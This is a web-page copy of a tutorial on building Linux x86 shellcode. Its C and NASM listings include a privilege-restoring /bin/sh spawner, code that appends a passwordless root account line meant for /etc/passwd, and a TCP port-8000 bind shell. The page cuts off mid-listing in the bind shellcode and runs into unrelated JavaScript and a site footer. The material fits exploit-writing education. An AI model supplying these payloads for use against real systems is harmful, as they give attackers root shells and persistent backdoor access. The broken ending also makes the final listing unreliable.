Sub

Which Linux distribution you use?













Linux shellcode optimisation

Linux shellcode optimisation

Michał Piotrowski

A shellcode is an essential part of any exploit. During attack, it is injected into the target application and performs the desired actions within it. However, the basic rules for building shellcodes are not too widely known, even though they don't require advanced skills.

A shellcode (sometimes also called a bytecode) is a sequence of commands in machine code, constituting a vital element of all buffer overflow exploits. During attack, the exploit injects its shellcode into a running application, causing it to execute the intruder's commands within the target program. The name shellcode originates from the earliest codes of this type, whose purpose was to bring up the system shell (in Unix-based system, the shell is the /bin/sh program). The term currently encompasses all manner of codes, performing a huge variety of actions.

Any shellcode has to fulfil a number of requirements. The first is that cannot contain null bytes (0x00), since these signify the end of a character string and terminate processing for many functions commonly exploited for buffer overflows - strcpy(), strcat(), sprintf(), gets() etc. A shellcode must also be autonomous and operate independently of its current address in memory, so static addressing cannot be used. Other features which can occasionally be significant are the size and ASCII character set of the shellcode.

Let's have a look at writing shellcodes in practice. We will create four programs with different functionality and then go on to modify them so as to compact and adapt them for use in actual exploits. Note that we will be looking exclusively at shellcodes, not buffer overflow attacks or writing exploits.

To create an operational shellcode, we'll need a thorough understanding of assembly language for the shellcode's target processor (see Inset Registers and instructions). We'll be working on 32-bit x86 processors running the Linux operating system with the 2.4 kernel - all examples work with 2.6 series of Linux kernel, too - so we have a choice of two main assembler syntax conventions: AT&T and Intel. Although AT&T syntax is used by the majority of compilers and debuggers (including gcc and gdb), we will use Intel syntax for its greater clarity. All examples will be compiled using the Netwide Assembler (nasm) version 0.98.35, available in most popular Linux distributions. We will also use the ndisasm and hexdump utilities.

Registers and instructions

Registers (see Table 1) are small memory cells within the CPU, used for storing the numerical values required by the processor during program execution. In 32-bit x86 CPUs, the size of the registers is 32 bits (4 bytes). Registers can be divided according to their purpose into data registers (EAX, EBX, ECX, EDX) and address registers (ESI, EDI, ESP, EBP, EIP).

Data registers are divided up into smaller sections of 16 bits (AX, BX, CX, DX) and 8 bits (AH, AL, BH, BL, CH, CL, DH, DL). The smaller registers can be used to decrease code size and get rid of padding null bytes (see Figure 1). Most of the address registers have their own specific uses and should not be used for storing ordinary data.

Figure 1. Structure of the EAX register

 

Table 1. Registers in an x86 processor and their purposes

 

Register name

Purpose

EAX, AX, AH, AL - accumulator

Arithmetical operations, I/O operations and specifying the required system call. Also holds the value returned by a system call.

EBX, BX, BH, BL - base register

Used for indirect memory addressing. Also holds the first argument of a system call.

ECX, CX, CH, CL - counter

Typically used as a loop counter. Also holds the second argument of a system call.

EDX, DX, DH, DL - data register

Used to store variable addresses. Also holds the third argument of a system call.

ESI - source address, EDI - target address

Typically used for manipulating long data sequences, including strings and arrays.

ESP - stack top pointer

Holds the address of the top of the stack.

EBP - base pointer, frame pointer

Holds the address of the bottom of the stack. Used to refer to local variables stored in the current stack frame.

EIP - instruction pointer

Holds the address of the next instruction to be executed.

Assembly language instructions are basically symbolic processor commands. There are quite many of them, and the most important ones can be divided into:

  • move instructions (mov, push, pop),

  • arithmetical instructions (add, sub, inc, neg, mul, div),

  • logical instructions (and, or, xor, not),

  • control flow instructions (jmp, call, int, ret),

  • instructions for manipulating bits, bytes and character strings (shl, shr, rol, ror),

  • input/output instructions (in, out),

  • flag control instructions.

We won't go into all the available instructions, but rather we'll concentrate on just the ones we need. Table 2 presents a brief summary of the required instructions.

Table 2. Summary of the most useful assembler instructions

 

Instruction

Description

mov - move

Copies the contents of one memory segment into another: mov , .

push - put value on the stack

Copies the contents of a memory segment onto the stack: push .

pop - get value from the stack

Moves value from the stack into the specified memory segment: pop .

add - arithmetic addition

Adds the contents of one memory segment to another: add , .

sub - arithmetic subtraction

Subtracts the contents of one memory segment from another: sub , .

xor - exclusive OR

Calculates the symmetric difference of two specified memory segments: xor , .

jmp - jump

Writes the specified address to the EIP register: jmp

.

call - call

Works like jmp, but before writing to the EIP register it puts the address of the next instruction on the stack: call

.

lea - load address

Writes the address of the segment to the segment: lea , .

int - interrupt

Sends the specified signal to the system kernel, calling the interrupt with the specified number: int .

 

Building the shellcode

Our aim is to write four shellcodes, performing four different operations: writing a string to the standard output, appending data to a file, starting the system shell and binding the shell to a TCP port. We will start writing the programs in C, as it's much easier to translate a ready program into assembler than to write it in assembler from scratch.

The first program is simply called write - Listing 1 presents its source code. Its sole purpose is to write the message stored in the line variable to the standard output.

Listing 1. The write.c file

 
#include <stdio.h>
main()
{
char *line = "hello, world!n";
write(1, line, strlen(line));
exit(0);
}

 

Listing 2 shows another program, this time called add. Its purpose is to open a file called /file in writeable mode (the file may be empty, but it has to exist) and appending to it the line toor:x:0:0::/:/bin/bash. In reality we should be appending this entry to the /etc/passwd file, but for the time being it will be safer to refrain from modifying the password file.

Listing 2. The add.c file

 
#include <stdio.h>
#include <fcntl.h>
main()
{
char *name = "/file";
char *line =
"toor:x:0:0::/:/bin/bashn";
int fd;
fd = open(name,
O_WRONLY|O_APPEND);
write(fd, line, strlen(line));
close(fd);
exit(0);
}

 

The third program, called shell, is a classic shellcode. Its task is to run /bin/sh after executing the setreuid(0, 0) function to restore system privileges to the running process (this is necessary when attacking the suid program, as this casts away its system privileges for security reasons). Listing 3 shows the source of the shell program.

Listing 3. The shell.c file

 
#include <stdio.h>
main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
setreuid(0, 0);
execve(name[0],
name, NULL);
}

 

Our final and most advanced program is called bind (see Listing 4). When executed, the program listens on TCP port 8000 and upon receiving an incoming connection transfers communication to a running shell. This imitates the mode of operation of typical exploits used against network servers.

Listing 4. The bind.c file

 
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main()
{
char *name[2];
int fd1, fd2;
struct sockaddr_in serv;
name[0] = "/bin/sh";
name[1] = NULL;
serv.sin_addr.s_addr = 0;
serv.sin_port = htons(8000);
serv.sin_family = AF_INET;
fd1 = socket(AF_INET,
SOCK_STREAM, 0);
bind(fd1, (struct
sockaddr *)&serv, 16);
listen(fd1, 1);
fd2 = accept(fd1, 0, 0);
dup2(fd2, 0);
dup2(fd2, 1);
dup2(fd2, 2);
execve(name[0], name, NULL);
}

 

Figure 2 illustrates the compilation process and the effect of running the programs.

 

Figure 2. Compilation and execution of the write, add, shell and bind programs

 

On to assembler

Now that we know our applications are working as they should, we can go on to rewriting them in assembler. Our general aim is to execute the same system functions as in the C programs, but to do this we need to know the system numbers assigned to the functions. This information can be obtained from the /usr/include/asm/unistd.h file - the write() function is number 4, exit() is 1, open() is 5, close() is 6, setreuid() is 70, execve() is 11 and dup2() is 63. Socket manipulation functions are a slightly different story - socket(), bind(), listen() and accept() are all served by the same system call socketcall (number 102).

We also need to provide the functions with the necessary arguments. The first program only uses write() and exit(), so the matter is simple. The write() function takes three arguments: the target file descriptor, a pointer to source data buffer and the number of characters to be written. The exit() function only takes one argument - the exit status.

Write

Listing 5 presents the source code of the assembler equivalent of the write program. Lines 1 and 4 contain declarations for the data section (.data) and code section (.text). Line 6 marks the default ELF linker entry point, which has to be a global symbol due to the use of the ld linker (line 5). Line 2 defines the msg variable - a string of byte-size characters (the db parameter), terminated with a line feed character (0x0a). Lines 8 and 15 are comments and are ignored by the compiler. Lines 9-13 and 16-18 contain instructions preparing and executing the write() and exit() functions. Let's take a closer look at them.

Listing 5. The write1.asm file

 
1: section .data
2: msg db 'hello, world!', 0x0a
3:
4: section .text
5: global _start
6: _start:
7:
8: ; write(1, msg, 14)
9: mov eax, 4
10: mov ebx, 1
11: mov ecx, msg
12: mov edx, 14
13: int 0x80
14:
15: ; exit(0)
16: mov eax, 1
17: mov ebx, 0
18: int 0x80

 

To start with, we write the value of the system call to be executed into the EAX register (write is number 4) and put the function arguments into the appropriate registers: EBX should contain the standard output descriptor (number 1), ECX is filled with the starting address of the string to be written (stored in the msg variable), and EDX holds the string length (14 characters including the line feed). We then execute the instruction int 0x80 which takes execution into kernel mode and executes the relevant system function. The same mechanism applies to the exit() function - we put its number (1) in the EAX registry, write 0 to EBX and enter kernel mode once again. Figure 3 presents the compilation and execution of our first program rewritten in assembler.

 

Figure 3. Effect of executing the write1 program

 

Add

Listing 6 shows the code of the assembler rewrite of our second program, add. As you can see, it is slightly more complicated than the previous example.

Listing 6. The add1.asm file

 
1: section .data
2: name db 'file', 0
3: line db
'
toor:x:0:0::/:/bin/bash',
0x0a
4:
5: section .text
6: global _start
7: _start:
8:
9: ; open(name,
O_WRONLY|O_APPEND)
10: mov eax, 5
11: mov ebx, name
12: mov ecx, 1025
13: int 0x80
14:
15: mov ebx, eax
16:
17: ; write(fd, line, 24)
18: mov eax, 4
19: mov ecx, line
20: mov edx, 24
21: int 0x80
22:
23: ; close(fd)
24: mov eax, 6
25: int 0x80
26:
27: ; exit(0)
28: mov eax, 1
29: mov ebx, 0
30: int 0x80

 

We start by declaring two character variables in the data section - name and line. They contain respectively the name of the file to be modified and the line we want to append. Opening the file /file requires us to put the value for the open() function (5) in the EAX register and specify the function's two parameters:

  • the address of the name variable, stored in the EBX register;

  • the value 1025 (the numeric representation of the combined O_WRONLY and O_APPEND flags), stored in the ECX register.

After it is executed, the open() function returns its result (the descriptor number for the opened file) into the EAX register. We'll need the descriptor value to execute the write() and close() functions, so in line 15 we move it into the EBX register. Thus, the next function to be called (i.e. write()) has its first argument (the descriptor number) in the right place (the EBX register). Now we put 4 in the EAX register and 24 (the length of the appended line) in the ECX register, and transfer execution to the system kernel (line 21).

We then need to close /file by calling close() (the EAX register should contain 6, while EBX still holds the descriptor number for the opened file) and we can end the program by calling exit() (with 1 in EAX and 0 in EBX). Figure 4 presents the compilation and execution of the program.

 

Figure 4. Effect of executing the add1.asm program

 

Shell

The shell program needs to be rewritten in a similar way - Listing 7 shows the resulting source code. We won't go into detail over it, but rather we'll take a closer look at the seemingly complex execve() function call (lines 15-21).


Listing 7. The
shell1.asm file

 
1: section .data
2: name db '/bin/sh', 0
3:
4: section .text
5: global _start
6: _start:
7:
8: ; setreuid(0, 0)
9: mov eax, 70
10: mov ebx, 0
11: mov ecx, 0
12: int 0x80
13:
14: ; execve("/bin/sh",
["/bin/sh", NULL], NULL)
15: mov eax, 11
16: mov ebx, name
17: push 0
18: push name
19: mov ecx, esp
20: mov edx, 0
21: int 0x80

 

The first argument of the execve() function is the character string (line 16) specifying the path to the executed program (/bin/sh). The second argument is an array containing at least two elements: the path string and a NULL value. To prepare this array, we must resort to using the stack, first putting the second array element on the stack (NULL - line 17) and then the first element (the address of the name string - line 18). Then we set the second function argument (line 19) using the ESP register, which holds the address of the top of the stack and therefore the starting address of our array. The third and final argument is handled simply by loading 0 into the EDX register (as shown in line 20). The complete program is compiled and run just like our other programs.

Bind

The last of our shellcodes is the most complicated and requires a more detailed explanation due to the specific way of calling socket functions. Listing 8 presents the assembler version of the bind program.

Listing 8. The bind1.asm file

 
1: section .data
2: name db '/bin/sh', 0
3:
4: section .text
5: global _start
6: _start:
7:
8: ; socket(AF_INET,
SOCK_STREAM, 0)
9: push 0
10: push 1
11: push 2
12:
13: mov eax, 102
14: mov ebx, 1
15: mov ecx, esp
16: int 0x80
17:
18: mov edx, eax
19:
20: ; bind(fd1, 
{AF_INET, 8000, 
"0.0.0.0"}, 16)
21
				function formreset(formId) {
				    var oForm=document.getElementById(formId);
				    if (oForm.length >0)
				    {
				    for (var i=0; i
				

Web Design Services